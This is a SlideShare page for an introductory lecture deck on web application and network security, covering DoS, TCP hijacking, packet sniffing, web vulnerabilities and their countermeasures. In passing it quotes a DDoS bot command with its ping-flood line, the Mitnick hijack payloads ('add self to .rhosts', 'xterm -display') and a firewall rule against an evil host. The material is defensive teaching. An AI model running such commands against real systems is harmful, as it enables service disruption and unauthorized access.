SlideShare a Scribd company logo

Oss web application and network security

Download as PPTX, PDF
Rishabh Mehan, profile picture
Rishabh Mehan

The document provides an overview of web application and network security. It begins with definitions of web applications and how requests are made via protocols like HTTP and HTTPS. It then covers common security attacks such as denial of service attacks, TCP hijacking, and packet sniffing. The document discusses countermeasures for these attacks like firewalls, intrusion detection systems, and encryption. It also covers vulnerabilities in web applications like SQL injection, cross-site scripting, and input validation issues. The key information is on common security attacks against web applications and networks and their corresponding countermeasures.

Technology
1 of 42
Downloaded 15 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
Web Application and network security Rishabh Mehan
Saying Hello !!  To start off with the introduction lets go through few basics  What is a Web Application ?  Where is it Deployed ?  How can it be reached ?
Web Application
Protocols  HTTP – HTTPS  FTP – SFTP  TCP  SSH
Request Methods GET POST Form data encoded in the URL Data is included in the body of the request GET http://www.mysite.com/kgsearch/search.php?catid=1 HTTP/1.1 POST http://www.mysite.com/kgsearch/search.php HTTP/1.1 Host: www.mysite.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q= 0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.mysite.com/ Host: www.mysite.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q= 0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.mysite.com/ catid=1
How Request flows Server www.mybank.com (64.58.76.230) Port: 80 Client PC (10.1.0.123) Request Response
Words of Wisdom “Every program has at least two purposes: the one for which it was written, and another for which it wasn't.” -Alan J. Perlis
Oss web application and network security
infrastructure Very complex architectures, multiple platforms, multiple protocols Web Application HTTP Network Business Logic Customer Identification Media Store Browser Web Servers Database Server Presentation Layer Wireless Application Server Content Services Access Controls Transaction Information Core Business Data
Why vulnerabilities Security Professionals Don‟t Know The Applications “As a Network Security Professional, I don‟t know how my companies web applications are supposed to work so I deploy a protective solution…but don‟t know if it‟s protecting what it‟s supposed to.” The Web Application Security Gap Application Developers and QA Professionals Don‟t Know Security “As an Application Developer, I can build great features and functions while meeting deadlines, but I don‟t know how to develop my web application with security as a feature.”
Common security attacks and their countermeasures  Finding a way into the network  Firewalls  Exploiting software bugs, buffer overflows  Intrusion Detection Systems  Denial of Service  Ingress filtering, IDS  TCP hijacking  IPSec  Packet sniffing  Encryption (SSH, SSL, HTTPS)  Social problems  Education
Firewalls  Basic problem – many network applications and protocols have security problems that are fixed over time  Difficult for users to keep up with changes and keep host secure  Solution  Administrators limit access to end hosts by using a firewall  Firewall is kept up-to-date by administrators
Firewalls Internet DMZ Firewall Firewall Web server, email server, web proxy, etc Intranet
Firewalls  What does a firewall rule look like?  Depends on the firewall used  Example: ipfw  /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet  Other examples: WinXP & Mac OS X have built in and third party firewalls  Different graphical user interfaces  Varying amounts of complexity and power
Denial of Service  Purpose: Make a network service unusable, usually by overloading the server or network  Many different kinds of DoS attacks  SYN flooding  SMURF  Distributed attacks
Denial of Service  SYN flooding attack  Send SYN packets with bogus source address  Why?  Server responds with SYN ACK and keeps state about TCP half-open connection  Eventually, server memory is exhausted with this state  Solution: use “SYN cookies”  In response to a SYN, create a special “cookie” for the connection, and forget everything else  Then, can recreate the forgotten information when the ACK comes in from a legitimate connection
Denial of Service
Denial of Service  SMURF  Source IP address of a broadcast ping is forged  Large number of machines respond back to victim, overloading it
Denial of Service ICMP echo (spoofed source address of victim) Sent to IP broadcast address ICMP echo reply Internet Perpetrator Victim
Denial of Service  Distributed Denial of Service  Same techniques as regular DoS, but on a much larger scale  Example: Sub7Server Trojan and IRC bots  Infect a large number of machines with a “zombie” program  Zombie program logs into an IRC channel and awaits commands  Example:  Bot command: !p4 207.71.92.193  Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000  Sends 10,000 64k packets to the host (655MB!)  Read more at: http://grc.com/dos/grcdos.htm
TCP Attacks  Recall how IP works…  End hosts create IP packets and routers process them purely based on destination address alone  Problem: End hosts may lie about other fields which do not affect delivery  Source address – host may trick destination into believing that the packet is from a trusted source  Especially applications which use IP addresses as a simple authentication method  Solution – use better authentication methods
TCP Attacks  TCP connections have associated state  Starting sequence numbers, port numbers  Problem – what if an attacker learns these values?  Port numbers are sometimes well known to begin with (ex. HTTP uses port 80)  Sequence numbers are sometimes chosen in very predictable ways
TCP Attacks  If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!  Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source  Ex. Instead of downloading and running new program, you download a virus and execute it
TCP Attacks  Say hello to Alice, Bob and Mr. Big Ears
TCP Attacks  Alice and Bob have an established TCP connection
TCP Attacks  Mr. Big Ears lies on the path between Alice and Bob on the network  He can intercept all of their packets
TCP Attacks  First, Mr. Big Ears must drop all of Alice‟s packets since they must not be delivered to Bob (why?) Packets The Void
TCP Attacks  Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network) ISN, SRC=Alice
TCP Attacks  What if Mr. Big Ears is unable to sniff the packets between Alice and Bob?  Can just DoS Alice instead of dropping her packets  Can just send guesses of what the ISN is until it is accepted  How do you know when the ISN is accepted?  Mitnick: payload is “add self to .rhosts”  Or, “xterm -display MrBigEars:0”
TCP Attacks  Why are these types of TCP attacks so dangerous? Web server Trusting web client Malicious user
TCP Attacks  How do we prevent this?  IPSec  Provides source authentication, so Mr. Big Ears cannot pretend to be Alice  Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing what the session key is
Packet Sniffing  Recall how Ethernet works …  When someone wants to send a packet to some else …  They put the bits on the wire with the destination MAC address …  And remember that other hosts are listening on the wire to detect for collisions …  It couldn‟t get any easier to figure out what data is being transmitted over the network!
Packet Sniffing  How can we protect ourselves?  SSH, not Telnet  Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!)  Now that I have told you this, please do not exploit this information  Packet sniffing is, by the way, prohibited by Computing Services  HTTP over SSL  Especially when making purchases with credit cards!  SFTP, not FTP  Unless you really don‟t care about the password or data  Can also use KerbFTP (download from MyAndrew)  IPSec  Provides network-layer confidentiality
Web Application Vulnerabilities Web application vulnerabilities occur in multiple areas. Application Administration Extension Checking Common File Checks Platform Known Vulnerabilities Application Mapping Custom Application Scripting Data Extension Checking Parameter Manipulation Backup Checking Reverse Directory Transversal Directory Enumeration Path Truncation Hidden Web Paths Forceful Browsing Cookie Manipulation Brute Force Application Mapping Cookie Poisoning/Theft Buffer Overflow SQL Injection Cross-site scripting
What the #@$& is happening ??? % Info Disclosure, 3 Info Disclosure Axis Title File Include File Include Input Valdation Input Valdation Auth Auth % SQL Injection SQL Injection XSS XSS 0 10 20 30 Axis Title 40 50
Web Application Vulnerabilities Platform:  Known vulnerabilities can be Platform Known Vulnerabilities exploited immediately with a minimum amount of skill or experience – “script kiddies”  Most easily defendable of all web vulnerabilities  MUST have streamlined patching procedures
Web Application Vulnerabilities Administration: Administration Extension Checking Common File Checks Data Extension Checking • • • Backup Checking Directory Enumeration Path Truncation Hidden Web Paths Forceful Browsing • • Less easily corrected than known issues Require increased awareness More than just configuration, must be aware of security flaws in actual content Remnant files can reveal applications and versions in use Backup files can reveal source code and database connection strings
Web Application Vulnerabilities Application Programming: • Application Application Mapping Cookie Manipulation Custom Application Scripting Parameter Manipulation Reverse Directory Transversal Brute Force Application Mapping Cookie Poisoning/Theft Buffer Overflow SQL Injection Cross-site scripting Common coding techniques do not necessarily include security • Input is Administration assumed to be valid, but not tested • Unexamined input from a browser can inject scripts into page for replay against later visitors • Unhandled error messages reveal application and database structures • Unchecked database calls can be „piggybacked‟ with a hacker‟s own database call, giving direct access to business data through a web browser
Examples  http://demo.testfire.net/  http://chat.wallhood.com/moving/moving/images/
How to Secure Web Applications  Incorporate security into the lifecycle  Apply information security principles to all software development efforts  Educate  Issue awareness, Training, etc…
Are We still Secure ? LOL NO
Questions ?

More Related Content

PPT
Dmk Bo2 K7 Web
royans
 
PPT
Design Reviewing The Web
amiable_indian
 
PPSX
Network security
syed mehdi raza
 
PDF
Computer network (2)
NYversity
 
PPT
Network Security
DURYODHAN MAHAPATRA
 
PPT
Hacking tutorial
MSA Technosoft
 
PPTX
Kipp Berdiansky on Tcp syn flooding and ip spoofing attacks
Kipp Berdiansky
 
PPT
Hacking
rameswara reddy venkat
 
Dmk Bo2 K7 Web
royans
 
Design Reviewing The Web
amiable_indian
 
Network security
syed mehdi raza
 
Computer network (2)
NYversity
 
Network Security
DURYODHAN MAHAPATRA
 
Hacking tutorial
MSA Technosoft
 
Kipp Berdiansky on Tcp syn flooding and ip spoofing attacks
Kipp Berdiansky
 
Hacking
rameswara reddy venkat
 

What's hot (19)

PPT
Hacking
Roshan Chaudhary
 
PPT
Hacking 1224807880385377-9
Geoff Pesimo
 
PPT
Hacking In Detail
Greater Noida Institute Of Technology
 
PPT
ip spoofing
vipin soni
 
PPT
Ip Spoofing
arpit.arp
 
RTF
Find ip address
sasandeaynat
 
PDF
CEHv7 Question Collection
Manish Luintel
 
PDF
Dns tunnelling its all in the name
Security BSides London
 
PPTX
Ip spoofing ppt
Anushakp9
 
PDF
Ip spoofing attacks
Apijay Kumar
 
PDF
CMIT 321 QUIZ 1
HamesKellor
 
PPT
Spoofing
Greater Noida Institute Of Technology
 
PDF
Proposed Methods of IP Spoofing Detection & Prevention
International Journal of Science and Research (IJSR)
 
PPT
Ipspoofing
Akhil Kumar
 
PDF
How to use packet sniffers
Deepika Padmanabhan
 
PPT
Hacking
Sweta Leena Panda
 
PPTX
Attacks and their mitigations
Mukesh Chaudhari
 
PPT
Hacking
SUNY Oneonta
 
PPTX
Internet security
gohel
 
Hacking
Roshan Chaudhary
 
Hacking 1224807880385377-9
Geoff Pesimo
 
Hacking In Detail
Greater Noida Institute Of Technology
 
ip spoofing
vipin soni
 
Ip Spoofing
arpit.arp
 
Find ip address
sasandeaynat
 
CEHv7 Question Collection
Manish Luintel
 
Dns tunnelling its all in the name
Security BSides London
 
Ip spoofing ppt
Anushakp9
 
Ip spoofing attacks
Apijay Kumar
 
CMIT 321 QUIZ 1
HamesKellor
 
Spoofing
Greater Noida Institute Of Technology
 
Proposed Methods of IP Spoofing Detection & Prevention
International Journal of Science and Research (IJSR)
 
Ipspoofing
Akhil Kumar
 
How to use packet sniffers
Deepika Padmanabhan
 
Hacking
Sweta Leena Panda
 
Attacks and their mitigations
Mukesh Chaudhari
 
Hacking
SUNY Oneonta
 
Internet security
gohel
 
Ad

Viewers also liked (20)

PPT
Authentication Application in Network Security NS4
koolkampus
 
PPTX
Cryptography.ppt
kusum sharma
 
PDF
Network Security Applications
Hatem Mahmoud
 
PPTX
Party pronto pres new
Steven Montgomery
 
PDF
Basic Network Security_Primer
n|u - The Open Security Community
 
PPTX
Presentation1 new (1) (1)cf
toamma
 
PPT
Networksecurity&cryptography
Presentaionslive.blogspot.com
 
PPT
Network Security Tools and applications
webhostingguy
 
PPTX
Contaminacion del aire y de las aguas
Jorge Salazar
 
PPTX
E securty
Yıldırım Tam
 
PPT
Kerberos (1)
Ana Salas Elizondo
 
PPTX
Network security & cryptography
pinkutinku26
 
PPT
Celebrity Cricket League 2016 - http://ccl5.com/
Tania Agni
 
PPT
Rashed al kamdah network security threats
rashidalkamdah
 
PPT
Cryptography and network security
Mahipesh Satija
 
PPTX
Presentation network security
cegonsoft1999
 
PPTX
Network security and cryptography
Pavithra renu
 
PPTX
Network and network security
Ruchi Gupta
 
PPTX
Nymble: Blocking System
Manzeer Fasaludeen
 
PPTX
Network security - Basic concepts
Khoa Nguyen
 
Authentication Application in Network Security NS4
koolkampus
 
Cryptography.ppt
kusum sharma
 
Network Security Applications
Hatem Mahmoud
 
Party pronto pres new
Steven Montgomery
 
Basic Network Security_Primer
n|u - The Open Security Community
 
Presentation1 new (1) (1)cf
toamma
 
Networksecurity&cryptography
Presentaionslive.blogspot.com
 
Network Security Tools and applications
webhostingguy
 
Contaminacion del aire y de las aguas
Jorge Salazar
 
E securty
Yıldırım Tam
 
Kerberos (1)
Ana Salas Elizondo
 
Network security & cryptography
pinkutinku26
 
Celebrity Cricket League 2016 - http://ccl5.com/
Tania Agni
 
Rashed al kamdah network security threats
rashidalkamdah
 
Cryptography and network security
Mahipesh Satija
 
Presentation network security
cegonsoft1999
 
Network security and cryptography
Pavithra renu
 
Network and network security
Ruchi Gupta
 
Nymble: Blocking System
Manzeer Fasaludeen
 
Network security - Basic concepts
Khoa Nguyen
 
Ad

Similar to Oss web application and network security (20)

PPT
Network seurity
Naqash Rasheed
 
PPTX
Internet security
gOhElprashanT
 
PPT
Hacking Cisco
guestd05b31
 
ODP
Wifi Security, or Descending into Depression and Drink
SecurityTube.Net
 
PPTX
The Network Protocol Stack Revisited
inbroker
 
PPT
Network Security R U Secure???
trendy updates
 
PDF
Understanding computer networks
UC San Diego
 
PPT
12 tcp-dns
Culverton Blessy
 
PPT
Network Security fundamentals
Tariq kanher
 
PPT
3.Network
phanleson
 
PPT
Web Application Security
Abdul Wahid
 
PDF
08 tcp-dns
pantu_1961
 
PPTX
Root via sms. 4G security assessment
Sergey Gordeychik
 
PPT
T C P I P Weaknesses And Solutions
eroglu
 
PPT
Simplified Networking and Troubleshooting for K-12 Teachers
webhostingguy
 
PDF
class12_Networking2
T. J. Saotome
 
PDF
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
Sandro Gauci
 
PPTX
Open source network forensics and advanced pcap analysis
GTKlondike
 
PDF
DDoS-bdNOG
Zobair Khan
 
PPTX
Denial of service attack
Kaustubh Padwad
 
Network seurity
Naqash Rasheed
 
Internet security
gOhElprashanT
 
Hacking Cisco
guestd05b31
 
Wifi Security, or Descending into Depression and Drink
SecurityTube.Net
 
The Network Protocol Stack Revisited
inbroker
 
Network Security R U Secure???
trendy updates
 
Understanding computer networks
UC San Diego
 
12 tcp-dns
Culverton Blessy
 
Network Security fundamentals
Tariq kanher
 
3.Network
phanleson
 
Web Application Security
Abdul Wahid
 
08 tcp-dns
pantu_1961
 
Root via sms. 4G security assessment
Sergey Gordeychik
 
T C P I P Weaknesses And Solutions
eroglu
 
Simplified Networking and Troubleshooting for K-12 Teachers
webhostingguy
 
class12_Networking2
T. J. Saotome
 
CommCon 2023 - WebRTC & Video Delivery application security - what could poss...
Sandro Gauci
 
Open source network forensics and advanced pcap analysis
GTKlondike
 
DDoS-bdNOG
Zobair Khan
 
Denial of service attack
Kaustubh Padwad
 

Recently uploaded (20)

PDF
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf
Microsoft Dynamics
 
PDF
Hindi spoken digit analysis for native and non-native speakers
IAESIJAI
 
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
PPTX
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PDF
Getting Started with Data Integration: FME Form 101
Safe Software
 
PPTX
SOPHOS-XG Firewall Administrator PPT.pptx
AgnesMunisi
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PDF
A comparative analysis of optical character recognition models for extracting...
IAESIJAI
 
PDF
Hybrid model detection and classification of lung cancer
IAESIJAI
 
PDF
DP Operators-handbook-extract for the Mautical Institute
LeonelMejiaLarios
 
PDF
project resource management chapter-09.pdf
ssuser00e6e21
 
PPTX
Group 1 Presentation -Planning and Decision Making .pptx
MatthewLewis227954
 
PDF
Univ-Connecticut-ChatGPT-Presentaion.pdf
ry7r52mzb4
 
PDF
DASA ADMISSION 2024_FirstRound_FirstRank_LastRank.pdf
rameswartudu05
 
PDF
A novel scalable deep ensemble learning framework for big data classification...
IAESIJAI
 
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
PDF
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
PDF
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf
Microsoft Dynamics
 
Hindi spoken digit analysis for native and non-native speakers
IAESIJAI
 
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
Encapsulation theory and applications.pdf
gurumoop
 
Getting Started with Data Integration: FME Form 101
Safe Software
 
SOPHOS-XG Firewall Administrator PPT.pptx
AgnesMunisi
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
A comparative analysis of optical character recognition models for extracting...
IAESIJAI
 
Hybrid model detection and classification of lung cancer
IAESIJAI
 
DP Operators-handbook-extract for the Mautical Institute
LeonelMejiaLarios
 
project resource management chapter-09.pdf
ssuser00e6e21
 
Group 1 Presentation -Planning and Decision Making .pptx
MatthewLewis227954
 
Univ-Connecticut-ChatGPT-Presentaion.pdf
ry7r52mzb4
 
DASA ADMISSION 2024_FirstRound_FirstRank_LastRank.pdf
rameswartudu05
 
A novel scalable deep ensemble learning framework for big data classification...
IAESIJAI
 
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 

Oss web application and network security

  • 1. Web Application and network security Rishabh Mehan
  • 2. Saying Hello !!  To start off with the introduction lets go through few basics  What is a Web Application ?  Where is it Deployed ?  How can it be reached ?
  • 4. Protocols  HTTP – HTTPS  FTP – SFTP  TCP  SSH
  • 5. Request Methods GET POST Form data encoded in the URL Data is included in the body of the request GET http://www.mysite.com/kgsearch/search.php?catid=1 HTTP/1.1 POST http://www.mysite.com/kgsearch/search.php HTTP/1.1 Host: www.mysite.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q= 0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.mysite.com/ Host: www.mysite.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q= 0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.mysite.com/ catid=1
  • 6. How Request flows Server www.mybank.com (64.58.76.230) Port: 80 Client PC (10.1.0.123) Request Response
  • 7. Words of Wisdom “Every program has at least two purposes: the one for which it was written, and another for which it wasn't.” -Alan J. Perlis
  • 9. infrastructure Very complex architectures, multiple platforms, multiple protocols Web Application HTTP Network Business Logic Customer Identification Media Store Browser Web Servers Database Server Presentation Layer Wireless Application Server Content Services Access Controls Transaction Information Core Business Data
  • 10. Why vulnerabilities Security Professionals Don‟t Know The Applications “As a Network Security Professional, I don‟t know how my companies web applications are supposed to work so I deploy a protective solution…but don‟t know if it‟s protecting what it‟s supposed to.” The Web Application Security Gap Application Developers and QA Professionals Don‟t Know Security “As an Application Developer, I can build great features and functions while meeting deadlines, but I don‟t know how to develop my web application with security as a feature.”
  • 11. Common security attacks and their countermeasures  Finding a way into the network  Firewalls  Exploiting software bugs, buffer overflows  Intrusion Detection Systems  Denial of Service  Ingress filtering, IDS  TCP hijacking  IPSec  Packet sniffing  Encryption (SSH, SSL, HTTPS)  Social problems  Education
  • 12. Firewalls  Basic problem – many network applications and protocols have security problems that are fixed over time  Difficult for users to keep up with changes and keep host secure  Solution  Administrators limit access to end hosts by using a firewall  Firewall is kept up-to-date by administrators
  • 14. Firewalls  What does a firewall rule look like?  Depends on the firewall used  Example: ipfw  /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet  Other examples: WinXP & Mac OS X have built in and third party firewalls  Different graphical user interfaces  Varying amounts of complexity and power
  • 15. Denial of Service  Purpose: Make a network service unusable, usually by overloading the server or network  Many different kinds of DoS attacks  SYN flooding  SMURF  Distributed attacks
  • 16. Denial of Service  SYN flooding attack  Send SYN packets with bogus source address  Why?  Server responds with SYN ACK and keeps state about TCP half-open connection  Eventually, server memory is exhausted with this state  Solution: use “SYN cookies”  In response to a SYN, create a special “cookie” for the connection, and forget everything else  Then, can recreate the forgotten information when the ACK comes in from a legitimate connection
  • 18. Denial of Service  SMURF  Source IP address of a broadcast ping is forged  Large number of machines respond back to victim, overloading it
  • 19. Denial of Service ICMP echo (spoofed source address of victim) Sent to IP broadcast address ICMP echo reply Internet Perpetrator Victim
  • 20. Denial of Service  Distributed Denial of Service  Same techniques as regular DoS, but on a much larger scale  Example: Sub7Server Trojan and IRC bots  Infect a large number of machines with a “zombie” program  Zombie program logs into an IRC channel and awaits commands  Example:  Bot command: !p4 207.71.92.193  Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000  Sends 10,000 64k packets to the host (655MB!)  Read more at: http://grc.com/dos/grcdos.htm
  • 21. TCP Attacks  Recall how IP works…  End hosts create IP packets and routers process them purely based on destination address alone  Problem: End hosts may lie about other fields which do not affect delivery  Source address – host may trick destination into believing that the packet is from a trusted source  Especially applications which use IP addresses as a simple authentication method  Solution – use better authentication methods
  • 22. TCP Attacks  TCP connections have associated state  Starting sequence numbers, port numbers  Problem – what if an attacker learns these values?  Port numbers are sometimes well known to begin with (ex. HTTP uses port 80)  Sequence numbers are sometimes chosen in very predictable ways
  • 23. TCP Attacks  If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!  Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source  Ex. Instead of downloading and running new program, you download a virus and execute it
  • 24. TCP Attacks  Say hello to Alice, Bob and Mr. Big Ears
  • 25. TCP Attacks  Alice and Bob have an established TCP connection
  • 26. TCP Attacks  Mr. Big Ears lies on the path between Alice and Bob on the network  He can intercept all of their packets
  • 27. TCP Attacks  First, Mr. Big Ears must drop all of Alice‟s packets since they must not be delivered to Bob (why?) Packets The Void
  • 28. TCP Attacks  Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network) ISN, SRC=Alice
  • 29. TCP Attacks  What if Mr. Big Ears is unable to sniff the packets between Alice and Bob?  Can just DoS Alice instead of dropping her packets  Can just send guesses of what the ISN is until it is accepted  How do you know when the ISN is accepted?  Mitnick: payload is “add self to .rhosts”  Or, “xterm -display MrBigEars:0”
  • 30. TCP Attacks  Why are these types of TCP attacks so dangerous? Web server Trusting web client Malicious user
  • 31. TCP Attacks  How do we prevent this?  IPSec  Provides source authentication, so Mr. Big Ears cannot pretend to be Alice  Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing what the session key is
  • 32. Packet Sniffing  Recall how Ethernet works …  When someone wants to send a packet to some else …  They put the bits on the wire with the destination MAC address …  And remember that other hosts are listening on the wire to detect for collisions …  It couldn‟t get any easier to figure out what data is being transmitted over the network!
  • 33. Packet Sniffing  How can we protect ourselves?  SSH, not Telnet  Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!)  Now that I have told you this, please do not exploit this information  Packet sniffing is, by the way, prohibited by Computing Services  HTTP over SSL  Especially when making purchases with credit cards!  SFTP, not FTP  Unless you really don‟t care about the password or data  Can also use KerbFTP (download from MyAndrew)  IPSec  Provides network-layer confidentiality
  • 34. Web Application Vulnerabilities Web application vulnerabilities occur in multiple areas. Application Administration Extension Checking Common File Checks Platform Known Vulnerabilities Application Mapping Custom Application Scripting Data Extension Checking Parameter Manipulation Backup Checking Reverse Directory Transversal Directory Enumeration Path Truncation Hidden Web Paths Forceful Browsing Cookie Manipulation Brute Force Application Mapping Cookie Poisoning/Theft Buffer Overflow SQL Injection Cross-site scripting
  • 35. What the #@$& is happening ??? % Info Disclosure, 3 Info Disclosure Axis Title File Include File Include Input Valdation Input Valdation Auth Auth % SQL Injection SQL Injection XSS XSS 0 10 20 30 Axis Title 40 50
  • 36. Web Application Vulnerabilities Platform:  Known vulnerabilities can be Platform Known Vulnerabilities exploited immediately with a minimum amount of skill or experience – “script kiddies”  Most easily defendable of all web vulnerabilities  MUST have streamlined patching procedures
  • 37. Web Application Vulnerabilities Administration: Administration Extension Checking Common File Checks Data Extension Checking • • • Backup Checking Directory Enumeration Path Truncation Hidden Web Paths Forceful Browsing • • Less easily corrected than known issues Require increased awareness More than just configuration, must be aware of security flaws in actual content Remnant files can reveal applications and versions in use Backup files can reveal source code and database connection strings
  • 38. Web Application Vulnerabilities Application Programming: • Application Application Mapping Cookie Manipulation Custom Application Scripting Parameter Manipulation Reverse Directory Transversal Brute Force Application Mapping Cookie Poisoning/Theft Buffer Overflow SQL Injection Cross-site scripting Common coding techniques do not necessarily include security • Input is Administration assumed to be valid, but not tested • Unexamined input from a browser can inject scripts into page for replay against later visitors • Unhandled error messages reveal application and database structures • Unchecked database calls can be „piggybacked‟ with a hacker‟s own database call, giving direct access to business data through a web browser
  • 40. How to Secure Web Applications  Incorporate security into the lifecycle  Apply information security principles to all software development efforts  Educate  Issue awareness, Training, etc…
  • 41. Are We still Secure ? LOL NO